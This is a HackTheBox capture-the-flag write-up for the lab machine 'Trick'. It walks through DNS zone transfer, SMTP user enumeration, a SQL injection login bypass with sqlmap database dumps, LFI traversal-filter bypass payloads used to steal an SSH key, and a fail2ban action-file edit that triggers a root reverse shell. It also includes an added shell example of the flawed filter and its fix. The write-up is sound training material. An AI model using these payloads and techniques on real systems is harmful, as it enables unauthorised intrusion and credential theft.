Trick – HackTheBox Writeup
Machine Name: Trick
IP: 10.10.11.166
Difficulty: Easy
Summary
Trick is a moderately easy machine that rewards thorough enumeration. Two sub-domains have to be found, one through a DNS zone transfer and the other through sub-domain fuzzing. The first sub-domain has a SQL injection that can be leveraged to gather information about the server, and the second has an LFI that exposes an SSH private key. This key gives SSH access as the user. Because that user can restart fail2ban as root, one of fail2ban's action files can be modified so that a ban triggers a reverse shell as root.
Information Gathering
The Nmap scan shows SSH, SMTP (25), DNS (53) and HTTP on port 80 (NGINX 1.14.2) open. I also added "trick.htb" to the hosts file.
nmap -sC -sV -oN trick 10.10.11.166
First, I looked at the web server on port 80 and found only dead links.
Next, I ran gobuster and found nothing useful. Then I enumerated SMTP on port 25.
Using telnet, I could do some banner grabbing and user enumeration with the VRFY command. A simple check is to verify the user root: the server answers with code 252 for a valid user (root) and 550 for a non-existent user (sid).
Of course, enumerating users by hand is not viable. I used Metasploit's auxiliary scanner "smtp_enum" to enumerate the users.
msfconsole
use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.11.166
RHOSTS => 10.10.11.166
msf6 auxiliary(scanner/smtp/smtp_enum) > run
Although I found some valid users, I had nowhere to use them yet, so I moved on to enumerating DNS on port 53.
Let's use "dig" to request ANY record for trick.htb.
dig ANY trick.htb @10.10.11.166
We find another sub-domain named "root.trick.htb". Let's add that to the hosts file. It serves the same page as "trick.htb". Next, I tried a zone transfer.
dig axfr trick.htb @10.10.11.166
Another sub-domain named “preprod-payroll.trick.htb” is found. After adding that to the hosts file, I visited the site and found a login page.
Default credentials such as "admin:admin" do not work. With no other context, a login form is the obvious place to test for SQL injection. The payload below bypassed the login.
#SQLi payload
Username: ' OR 1 -- -
I also used sqlmap on the captured login request to find further injection points and use them to gather more information.
sqlmap -r login.req --level 5 --risk 3 --batch
Then I enumerated the databases and database users, and read a file from the filesystem.
sqlmap -r login.req --level 5 --risk 3 --batch --dbs
sqlmap -r login.req --level 5 --risk 3 --batch --users
sqlmap -r login.req --level 5 --risk 3 --batch --file-read=/etc/passwd
Two new system users, "michael" and "remo", are found in /etc/passwd.
Let's also look at the "users" table in the database "payroll_db".
sqlmap -r login.req --level 5 --risk 3 --batch -D payroll_db -T users --columns
Let’s grab all those columns as well.
sqlmap -r login.req --level 5 --risk 3 --batch -D payroll_db -T users -C id,name,password,username --dump
We have credentials for an Administrator with the username “Enemigosss” and password “SuperGucciRainbowCake”.
If we look at the Users’ tab in the “preprod-payroll.trick.htb” page, we can obtain the same credentials by inspecting the password field.
Another potential username was found in the Employee List tab.
We gathered a lot of usernames but only one password. Let's try these credentials against SSH.
crackmapexec ssh trick.htb -u users.txt -p pass.txt
None of the credentials worked.
I was stuck here until I went back to discovering sub-domains, this time by fuzzing the Host header.
Gaining User Shell
wfuzz -H 'Host: preprod-FUZZ.trick.htb' -u 10.10.11.166 -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hw 475
Fuzzing returned a second "preprod-" sub-domain, which I added to the hosts file. Its pages are loaded through a GET parameter ("page=") in the URL, which is a strong hint for LFI.
Plain directory traversal returns nothing, so some filtering or blocking mechanism is in place. A few attempts later, I found that the string "../" was being removed, and that the payload "....//" bypasses this: once "../" is stripped from the middle of "....//", what remains is "../" again, so the filter only works if it is applied a single time.
page=../../../../../../etc/passwd #Does not work
page=....//....//....//....//....//etc/passwd #Works
page=..././..././..././..././etc/passwd #Works
Great! Let's see if we can get an SSH private key. Using the same payload against the home directory, I was able to retrieve the private key of the user "michael".
I copied this key to a file, set its permissions to 600 (SSH refuses keys that are readable by others), and used it to log in through SSH.
Got the user flag!
To confirm what kind of filter was being used, I looked at the source code of the page.
It was indeed removing every occurrence of "../" with a single string replacement, which is exactly why "....//" survives.
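The following is an added example, not code from the writeup or from the machine: it reproduces a single-pass removal of "../" with sed, runs the three payloads from above through it, and shows that repeating the removal until nothing changes closes this particular bypass. The sample payloads are constructed here.

```shell
# Added example: a single-pass "../" strip (as the vulnerable page did) next to
# a repeated strip, applied to constructed traversal payloads.

# Single pass: every literal "../" is removed once, left to right, without
# re-scanning the text that the removal leaves behind.
lfi_filter() {
    printf '%s' "$1" | sed 's#\.\./##g'
}

# Repeated pass: keep stripping until the string stops changing, so that
# "....//" (which collapses to "../" after one pass) is removed as well.
lfi_filter_fixed() {
    prev=""
    cur="$1"
    while [ "$cur" != "$prev" ]; do
        prev="$cur"
        cur=$(printf '%s' "$cur" | sed 's#\.\./##g')
    done
    printf '%s' "$cur"
}

# Returns 0 when a traversal sequence is still present after filtering.
still_traverses() {
    case "$1" in
        *../*) return 0 ;;
        *)     return 1 ;;
    esac
}

# Constructed payloads: the plain one is neutralised, the other two survive.
for p in '../../../../etc/passwd' \
         '....//....//....//etc/passwd' \
         '..././..././..././etc/passwd'; do
    out=$(lfi_filter "$p")
    if still_traverses "$out"; then verdict="bypass"; else verdict="blocked"; fi
    printf '%-32s -> %-24s %s\n' "$p" "$out" "$verdict"
done
```

The repeated strip only closes this one trick; the proper fix for a "page=" include is an allow-list of page names, or resolving the requested path and checking that it stays under the intended directory.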
Privilege Escalation
The first thing I always do is "sudo -l".
The user can restart fail2ban as root. Looking at the fail2ban configuration, the "action.d" directory is writable by the "security" group, and michael belongs to that group. Let's try to modify one of the files in "action.d".
In "jail.conf", the ban is defined as 10 seconds after more than 5 failed login attempts from one host.
The command run when an IP is banned is defined by the "actionban" line in "action.d/iptables-multiport.conf". We cannot write into this file, but because the directory itself is writable we can remove it and put our own copy in its place. The key is to get fail2ban, which runs its actions as root, to execute our command through "actionban".
First, I copied the file to /tmp so that I could edit it, and added a netcat reverse shell payload to the actionban line. Then I removed the original file and copied the edited file back to "/etc/fail2ban/action.d/iptables-multiport.conf".
With the payload in place, it has to be triggered by a ban. I started a netcat listener, ran the fail2ban restart command with sudo so the modified action file is loaded, and then failed SSH login more than 5 times (with hydra or repeated manual attempts) until the ban fired and the reverse shell came back.
Pwned!
Got root!